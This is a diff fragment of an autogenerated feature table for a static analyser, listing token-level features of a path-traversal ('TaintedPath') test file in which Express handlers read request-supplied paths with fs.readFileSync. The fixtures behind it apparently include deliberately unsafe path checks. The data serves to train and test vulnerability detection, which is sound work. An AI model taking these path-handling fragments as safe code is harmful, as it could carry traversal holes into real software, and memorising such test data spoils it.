autogenerated/TaintedPath/normalizedPaths.js:292:63:292:74 | workspaceDir | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:292:63:292:74 | workspaceDir | calleeImports | path | @@ -9239,6 +77414,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:292:78:292:84 | newpath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:292:78:292:84 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:292:78:292:84 | newpath | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:16 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:16 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:16 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:16 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:16 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:26 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:26 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:26 | pathModule.normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:26 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:26 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:40 | exceptional return of pathMod ... vePath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:40 | exceptional return of pathMod ... vePath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:40 | exceptional return of pathMod ... vePath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:40 | exceptional return of pathMod ... vePath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:40 | exceptional return of pathMod ... vePath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:40 | pathMod ... vePath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:40 | pathMod ... vePath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:40 | pathMod ... vePath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:40 | pathMod ... vePath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:40 | pathMod ... vePath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:55 | exceptional return of pathMod ... ('../') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:55 | exceptional return of pathMod ... ('../') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:55 | exceptional return of pathMod ... ('../') | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:55 | exceptional return of pathMod ... ('../') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:55 | exceptional return of pathMod ... ('../') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:55 | pathMod ... ('../') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:55 | pathMod ... ('../') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:55 | pathMod ... ('../') | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:55 | pathMod ... ('../') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:293:7:293:55 | pathMod ... ('../') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:293:18:293:26 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:293:18:293:26 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:293:18:293:26 | normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:293:18:293:26 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:293:18:293:26 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:293:28:293:39 | relativePath | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:293:28:293:39 | relativePath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:293:28:293:39 | relativePath | calleeImports | path | @@ -9248,6 +77458,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:293:28:293:39 | relativePath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:293:28:293:39 | relativePath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:293:28:293:39 | relativePath | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:293:42:293:48 | indexOf | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:293:42:293:48 | indexOf | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:293:42:293:48 | indexOf | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:293:42:293:48 | indexOf | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:293:42:293:48 | indexOf | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:293:50:293:54 | '../' | CalleeFlexibleAccessPath | pathModule.normalize().indexOf | | autogenerated/TaintedPath/normalizedPaths.js:293:50:293:54 | '../' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:293:50:293:54 | '../' | calleeImports | path | @@ -9256,6 +77471,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:293:50:293:54 | '../' | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | | autogenerated/TaintedPath/normalizedPaths.js:293:50:293:54 | '../' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:293:50:293:54 | '../' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:28 | exceptional return of fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:28 | exceptional return of fs.read ... ewpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:28 | exceptional return of fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:28 | fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:28 | fs.read ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:28 | fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:28 | fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:294:5:294:28 | fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:294:8:294:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:294:8:294:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:294:8:294:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:294:8:294:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:294:8:294:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:294:21:294:27 | newpath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:294:21:294:27 | newpath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:294:21:294:27 | newpath | calleeImports | fs | @@ -9265,6 +77505,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:294:21:294:27 | newpath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:294:21:294:27 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:294:21:294:27 | newpath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:28 | exceptional return of fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:28 | exceptional return of fs.read ... ewpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:28 | exceptional return of fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:28 | fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:28 | fs.read ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:28 | fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:28 | fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:296:5:296:28 | fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:296:8:296:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:296:8:296:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:296:8:296:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:296:8:296:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:296:8:296:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:296:21:296:27 | newpath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:296:21:296:27 | newpath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:296:21:296:27 | newpath | calleeImports | fs | @@ -9274,18 +77539,71 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:296:21:296:27 | newpath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:296:21:296:27 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:296:21:296:27 | newpath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:300:5:300:16 | isPathInside | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:300:5:300:16 | isPathInside | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:300:5:300:16 | isPathInside | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:300:5:300:16 | isPathInside | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:300:5:300:44 | isPathI 